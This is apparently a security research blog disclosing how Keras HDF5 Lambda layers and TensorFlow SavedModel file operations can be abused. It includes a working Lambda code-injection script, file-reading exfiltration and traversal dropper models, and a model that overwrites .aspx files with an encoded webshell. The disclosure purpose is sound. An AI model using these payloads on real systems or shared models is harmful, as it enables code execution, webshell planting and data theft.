Introduction

Throughout our previous blogs investigating the threats surrounding machine learning model storage formats, we’ve focused heavily on PyTorch models. Namely, how they can be abused to perform arbitrary code execution, from deploying ransomware to Cobalt Strike and Mythic C2 loaders and reverse shells and steganography. Although some of the attacks mentioned in our research blogs are known to a select few developers and security professionals, it is our intention to publicize them further, so ML practitioners can better evaluate risk and security implications during their day to day operations.

In our latest research, we decided to shift focus from PyTorch to another popular machine learning library, TensorFlow, and uncover how models saved using TensorFlow’s SavedModel format, as well as Keras’s HDF5 format, could potentially be abused by hackers.

Keras

Keras is a hugely popular machine learning framework developed using Python, which runs atop the TensorFlow machine learning platform and provides a high-level API to facilitate constructing, training, and saving models. Pre-trained models developed using Keras can be saved in a format called HDF5 (Hierarchical Data Format version 5), that “supports large, complex, heterogeneous data” and is used to serialize the layers, weights, and biases for a neural network. The HDF5 storage format is well-developed and relatively secure, being overseen by the HDF Group, with a large user base encompassing industry and scientific research. 

We therefore started wondering if it would be possible to perform arbitrary code execution via Keras models saved using the HDF5 format, in much the same way as for PyTorch?

Security researchers have discovered vulnerabilities that may be leveraged to perform code execution via HDF5 files. For example, Talos published a report in August 2022 highlighting weaknesses in the HDF5 GIF image file parser leading to three CVEs. However, while looking through the Keras code, we discovered an easier route to performing code injection in the form of a Keras API that allows a “Lambda layer” to be added to a model.

Code Execution via Lambda

The Keras documentation on Lambda layers states:

The Lambda layer exists so that arbitrary expressions can be used as a Layer when constructing Sequential and Functional API models. Lambda layers are best suited for simple operations or quick experimentation.

Keras Lambda layers have the following prototype, which allows for a Python function/lambda to be specified as input, as well as any required arguments:

tf.keras.layers.Lambda(

    function, output_shape=None, mask=None, arguments=None, **kwargs

)

Delving deeper into the Keras library to determine how Lambda layers are serialized when saving a model, we noticed that the underlying code is using Python’s marshal.dumps to serialize the Python code supplied using the function parameter to tf.keras.layers.Lambda. When loading an HDF5 model with a Lambda layer, the Python code is deserialized using marshal.loads, which decodes the Python code byte-stream (essentially like the contents of a .pyc file) and is subsequently executed.

Much like the pickle module, the marshal module also contains a big red warning about usage with untrusted input:

In a similar vein to our previous Pickle code injection PoC, we’ve developed a simple script that can be used to inject Lambda layers into an existing Keras/HDF5 model:

"""Inject a Keras Lambda function into an HDF5 model"""
import osimport argparseimport shutil
from pathlib import Path
import tensorflow as tf
parser = argparse.ArgumentParser(description="Keras Lambda Code Injection")parser.add_argument("path", type=Path)parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])parser.add_argument("args")parser.add_argument("-v", "--verbose",                    help="verbose logging", action="count")
args = parser.parse_args()
command_args = args.args
if os.path.isfile(command_args):    with open(command_args, "r") as in_file:        command_args = in_file.read()
def Exec(dummy, command_args):    if "keras_lambda_inject" not in globals():        exec(command_args)
def Eval(dummy, command_args):    if "keras_lambda_inject" not in globals():        eval(command_args)
def System(dummy, command_args):    if "keras_lambda_inject" not in globals():        import os        os.system(command_args)
def Runpy(dummy, command_args):    if "keras_lambda_inject" not in globals():        import runpy        runpy._run_code(command_args,{})
# Construct payloadif args.command == "system":    payload = tf.keras.layers.Lambda(System, name=args.command, arguments={"command_args":command_args})elif args.command == "exec":    payload = tf.keras.layers.Lambda(Exec, name=args.command, arguments={"command_args":command_args})elif args.command == "eval":    payload = tf.keras.layers.Lambda(Eval, name=args.command, arguments={"command_args":command_args})elif args.command == "runpy":    payload = tf.keras.layers.Lambda(Runpy, name=args.command, arguments={"command_args":command_args})
# Save a backup of the modelbackup_path = "{}.bak".format(args.path)shutil.copyfile(args.path, backup_path)
# Insert the Lambda payload into the modelhdf5_model = tf.keras.models.load_model(args.path)hdf5_model.add(payload)hdf5_model.save(args.path)

keras_inject.py

The above script allows for payloads to be inserted into a Lambda layer that will execute code or commands via os.system, exec, eval, or runpy._run_code. As a quick demonstration, let’s use exec to print out a message when a model is loaded:

> python keras_inject.py model.h5 exec “print(‘This model has been hijacked!’)”

To execute the payload, simply loading the model is sufficient:

> python>>> import tensorflow as tf>>> tf.keras.models.load_model(“model.h5”)
This model has been hijacked!

Success!

Whilst researching this code execution method, we discovered a Keras HDF5 model containing a Lambda function that was uploaded to VirusTotal on Christmas day 2022 from a user in Russia who was not logged in. Looking into the structure of the model file, named exploit.h5, we can observe the Lambda function encoded using base64:

{
   "class_name":"Lambda",
   "config":{
      "name":"lambda",
      "trainable":true,
      "dtype":"float32",
      "function":{
         "class_name":"__tuple__",
         "items":[
            "4wEAAAAAAAAAAQAAAAQAAAATAAAAcwwAAAB0AHwAiACIAYMDUwApAU4pAdoOX2ZpeGVkX3BhZGRp\nbmcpAdoBeCkC2gtrZXJuZWxfc2l6ZdoEcmF0ZakA+m5DOi9Vc2Vycy90YW5qZS9BcHBEYXRhL1Jv\nYW1pbmcvUHl0aG9uL1B5dGhvbjM3L3NpdGUtcGFja2FnZXMvb2JqZWN0X2RldGVjdGlvbi9tb2Rl\nbHMva2VyYXNfbW9kZWxzL3Jlc25ldF92MS5wedoIPGxhbWJkYT5lAAAA8wAAAAA=\n",
            null,
            {
               "class_name":"__tuple__",
               "items":[
                  7,
                  1
               ]

After decoding the base64 and using marshal.loads to decode the compiled Python, we can use dis.dis to disassemble the object and dis.show_code to display further information:

28           0 LOAD_CONST               1 (0)              2 LOAD_CONST               0 (None)              4 IMPORT_NAME              0 (os)              6 STORE_FAST               1 (os)
 29           8 LOAD_GLOBAL              1 (print)             10 LOAD_CONST               2 (‘INFECTED’)             12 CALL_FUNCTION            1             14 POP_TOP
 30          16 LOAD_FAST                0 (x)             18 RETURN_VALUE

Output from dis.dis()

Name:              exploitFilename:          infected.pyArgument count:    1Positional-only arguments: 0Kw-only arguments: 0Number of locals:  2Stack size:        2Flags:             OPTIMIZED, NEWLOCALS, NOFREEConstants:   0: None   1: 0   2: ‘INFECTED’Names:   0: os   1: printVariable names:   0: x   1: os

Output from dis.show_code()

The above payload simply prints the string “INFECTED” before returning and is clearly intended to test the mechanism, and likely uploaded to VirusTotal by a researcher to test the detection efficacy of anti-virus products.

It is worth noting that since December 2022, code has been added to Keras to prevent loading Lambda functions if not running in “safe mode,” but this method still works in the latest release, version 2.11.0, from 8 November 2022, as of the date of publication.

TensorFlow

Next, we delved deeper into the TensorFlow library to see if it might use pickle, marshal, exec, or any other generally unsafe Python functionality. 

At this point, it is worth discussing the modes in which TensorFlow can operate; eager mode and graph mode.

When running in eager mode, TensorFlow will execute operations immediately, as they are called, in a similar fashion to running Python code. This makes it easier to experiment and debug code, as results are computed immediately. Eager mode is useful for experimentation, learning, and understanding TensorFlow’s operations and APIs.

Graph mode, on the other hand, is a mode of operation whereby operations are not executed straight away but instead are added to a computational graph. The graph represents the sequence of operations to be executed and can be optimized for speed and efficiency. Once a graph is constructed, it can be run on one or more devices, such as CPUs or GPUs, to execute the operations. Graph mode is typically used for production deployment, as it can achieve better performance than eager mode for complex models and large datasets.

With this in mind, any form of attack is best focused against graph mode, as not all code and operations used in eager mode can be stored in a TensorFlow model, and the resulting computation graph may be shared with other people to use in their own training scenarios.

Under the hood, TensorFlow models are stored using the “SavedModel” format, which uses Google’s Protocol Buffers to store the data associated with the model, as well as the computational graph. A SavedModel provides a portable, platform-independent means of executing the “graph” outside of a Python environment (language agnostically). While it is possible to use a TensorFlow operation that executes Python code, such as tf.py_function, this operation will not persist to the SavedModel, and only works in the same address space as the Python program that invokes it when running in eager mode.

So whilst it isn’t possible to execute arbitrary Python code directly from a “SavedModel” when operating in graph mode, the SECURITY.md file encouraged us to probe further:

TensorFlow models are programs
TensorFlow models (to use a term commonly used by machine learning practitioners) are expressed as programs that TensorFlow executes. TensorFlow programs are encoded as computation graphs. The model’s parameters are often stored separately in checkpoints.
At runtime, TensorFlow executes the computation graph using the parameters provided. Note that the behavior of the computation graph may change depending on the parameters provided. TensorFlow itself is not a sandbox. When executing the computation graph, TensorFlow may read and write files, send and receive data over the network, and even spawn additional processes. All these tasks are performed with the permission of the TensorFlow process. Allowing for this flexibility makes for a powerful machine learning platform, but it has security implications.

The part about reading/writing files immediately got our attention, so we started to explore the underlying storage mechanisms and TensorFlow operations more closely. 

As it transpires, TensorFlow provides a feature-rich set of operations for working with models, layers, tensors, images, strings, and even file I/O that can be executed via a graph when running a SavedModel. We started speculating as to how an adversary might abuse these mechanisms to perform real-world attacks, such as code execution and data exfiltration, and decided to test some approaches.

Exfiltration via ReadFile

First up was tf.io.read_file, a simple I/O operation that allows the caller to read the contents of a file into a tensor. Could this be used for data exfiltration?

As a very simple test, using a tf.function that gets compiled into the network graph (and therefore persists to the graph within a SavedModel), we crafted a module that would read a file, secret.txt, from the file system and return it:

class ExfilModel(tf.Module):
  @tf.function
  def __call__(self, input):
    return tf.io.read_file("secret.txt")


model = ExfilModel()

When the model is saved using the SavedModel format, we can use the “saved_model_cli” to load and run the model with input:

> saved_model_cli run –dir .\tf2-exfil\ –signature_def serving_default –tag_set serve –input_exprs “input=1″Result for output key output:b’Super secret!

This yields our “Super secret!” message from secret.txt, but it isn’t very practical. Not all inference APIs will return tensors, and we may only receive a prediction class from certain models, so we cannot always return full file contents.

However, it is possible to use other operations, such as tf.strings.substr or tf.slice to extract a portion of a string/tensor, and leak it byte by byte in response to certain inputs. We have crafted a model to do just that based on a popular computer vision model architecture, which will exfil data in response to specific image files, although this is left as an exercise to the reader!  

Code Execution via WriteFile

Next up, we investigated tf.io.write_file, another simple I/O operation that allows the caller to write data to a file. While initially intended for string scalars stored in tensors, it is trivial to pass binary strings to the function, and even more helpful that it can be combined with tf.io.decode_base64 to decode base64 encoded data.

class DropperModel(tf.Module):
  @tf.function
  def __call__(self, input):
    tf.io.write_file("dropped.txt", tf.io.decode_base64("SGVsbG8h"))
    return input + 2


model = DropperModel()

If we save this model as a TensorFlow SavedModel, and again load and run it using “saved_model_cli”, we will end up with a file on the filesystem called “dropped.txt” containing the message “Hello!”.

Things start to get interesting when you factor in directory traversal (somewhat akin to the Zip Slip Vulnerability). In theory (although you would never run TensorFlow as root, right?!), it would be possible to overwrite existing files on the filesystem, such as SSH authorized_keys, or compiled programs or scripts:

class DropperModel(tf.Module):
  @tf.function
  def __call__(self, input):
    tf.io.write_file("../../bad.sh", tf.io.decode_base64("ZWNobyBwd25k"))
    return input + 2


model = DropperModel()

For a targeted attack, having the ability to conduct arbitrary file writes can be a powerful means of performing an initial compromise or in certain scenarios privilege escalation.

Directory Traversal via MatchingFiles

We also uncovered the tf.io.matching_files operation, which operates much like the glob function in Python, allowing the caller to obtain a listing of files within a directory. The matching files operation supports wildcards, and when combined with the read and write file operations, it can be used to make attacks performing data exfiltration or dropping files on the file system more powerful.

The following example highlights the possibility of using matching files to enumerate the filesystem and locate .aspx files (with the help of the tf.strings.regex_full_match operation) and overwrite any files found with a webshell that can be remotely operated by an attacker:

import tensorflow as tf


def walk(pattern, depth):
  if depth > 16:
    return
  files = tf.io.matching_files(pattern)
  if tf.size(files) > 0:
    for f in files:
      walk(tf.strings.join([f, "/*"]), depth + 1)
      if tf.strings.regex_full_match([f], ".*\.aspx")[0]:
        tf.print(f)
        tf.io.write_file(f, tf.io.decode_base64("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiJT48JWV2YWwoUmVxdWVzdC5Gb3JtWyJDb21tYW5kIl0sInVuc2FmZSIpOyU-"))


class WebshellDropper(tf.Module):
  @tf.function
  def __call__(self, input):
    walk(["../../../../../../../../../../../../*"], 0)
    return input + 1


model = WebshellDropper()

Impact

The above techniques can be leveraged by creating TensorFlow models that when shared and run, could allow an attacker to;

  • Replace binaries and either invoke them remotely or wait for them to be invoked by TensorFlow or some other task running on the system
  • Replace web pages to insert a webshell that can be operated remotely
  • Replace python files used by TensowFlow to execute malicious code

It might also be possible for an attacker to;

  • Enumerate the filesystem to read and exfiltrate sensitive information (such as training data) via an inference API
  • Overwrite system binaries to perform privilege escalation
  • Poison training data on the filesystem
  • Craft a destructive filesystem wiper
  • Construct a crude ransomware capable of encrypting files (by supplying encryption keys via an inference API and encrypting files using TensorFlow’s math and I/O operations)

In the interest of responsible disclosure, we reported our concerns to Google, who swiftly responded:

Hi! We’ve decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.

Users are recommended to run untrusted models in a sandbox.

Please feel free to publicly disclose this issue on GitHub as a public issue.

Conclusions

It’s becoming more apparent that machine learning models are not inherently secure, either through poor development choices, in the case of pickle and marshal usage, or by design, as with TensorFlow models functioning as a “program”. And we’re starting to see more abuse from adversaries, who will not hesitate to exploit these weaknesses to suit their nefarious aims, from initial compromise to privilege escalation and data exfiltration.

Despite the response from Google, not everyone will routinely run 3rd party models in a sandbox (although you almost certainly should). And even so, this may still offer an avenue for attackers to perform malicious actions within sandboxes and containers to which they wouldn’t ordinarily have access, including exfiltration and poisoning of training sets. It’s worth remembering that containers don’t contain, and sandboxes may be filled with more than just sand!

Now more than ever, it is imperative to ensure machine learning models are free from malicious code, operations and tampering before usage. However, with current anti-virus and endpoint detection and response (EDR) software lacking in scrutiny of ML artifacts, this can be challenging.